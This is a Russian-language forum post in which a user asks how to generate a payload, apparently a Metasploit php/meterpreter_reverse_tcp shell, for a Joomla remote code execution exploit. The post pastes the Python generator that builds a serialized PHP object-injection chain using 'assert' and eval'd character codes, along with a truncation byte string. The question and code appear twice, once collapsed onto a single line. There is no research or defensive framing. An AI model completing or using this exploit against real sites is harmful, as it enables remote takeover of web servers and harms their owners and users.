K
kamaz
Привет народ!!
это часть эксплойта ,где пайлд!
подскаите чем сгенерировать мне свой пайлод? и как правильно все указать?
---- Добавлено позже ----
этот пробую php/meterpreter_reverse_tcp ? но как все в коде указать?
это часть эксплойта ,где пайлд!
подскаите чем сгенерировать мне свой пайлод? и как правильно все указать?
Код:
def generate(payload):
php_payload = "eval({0})".format(toCharCode(payload))
terminate = '\xf0\xfd\xfd\xfd';
exploit_template = r'''}__test|O:21:"JDatabaseDriverMysqli":3:{s:2:"fc";O:17:"JSimplepieFactory":0:{}s:21:"\0\0\0disconnectHandlers";a:1:{i:0;a:2:{i:0;O:9:"SimplePie":5:{s:8:"sanitize";O:20:"JDatabaseDriverMysql":0:{}s:8:"feed_url";'''
injected_payload = "{};JFactory::getConfig();exit".format(php_payload)
exploit_template += r'''s:{0}:"{1}"'''.format(str(len(injected_payload)), injected_payload)
exploit_template += r''';s:19:"cache_name_function";s:6:"assert";s:5:"cache";b:1;s:11:"cache_class";O:20:"JDatabaseDriverMysql":0:{}}i:1;s:4:"init";}}s:13:"\0\0\0connection";b:1;}''' + terminate
return exploit_template
def exploit(url):
---- Добавлено позже ----
Привет народ!!
это часть эксплойта ,где пайлд!
подскаите чем сгенерировать мне свой пайлод? и как правильно все указать?
Код:def generate(payload): php_payload = "eval({0})".format(toCharCode(payload)) terminate = '\xf0\xfd\xfd\xfd'; exploit_template = r'''}__test|O:21:"JDatabaseDriverMysqli":3:{s:2:"fc";O:17:"JSimplepieFactory":0:{}s:21:"\0\0\0disconnectHandlers";a:1:{i:0;a:2:{i:0;O:9:"SimplePie":5:{s:8:"sanitize";O:20:"JDatabaseDriverMysql":0:{}s:8:"feed_url";''' injected_payload = "{};JFactory::getConfig();exit".format(php_payload) exploit_template += r'''s:{0}:"{1}"'''.format(str(len(injected_payload)), injected_payload) exploit_template += r''';s:19:"cache_name_function";s:6:"assert";s:5:"cache";b:1;s:11:"cache_class";O:20:"JDatabaseDriverMysql":0:{}}i:1;s:4:"init";}}s:13:"\0\0\0connection";b:1;}''' + terminate return exploit_template def exploit(url):
этот пробую php/meterpreter_reverse_tcp ? но как все в коде указать?
Последнее редактирование модератором: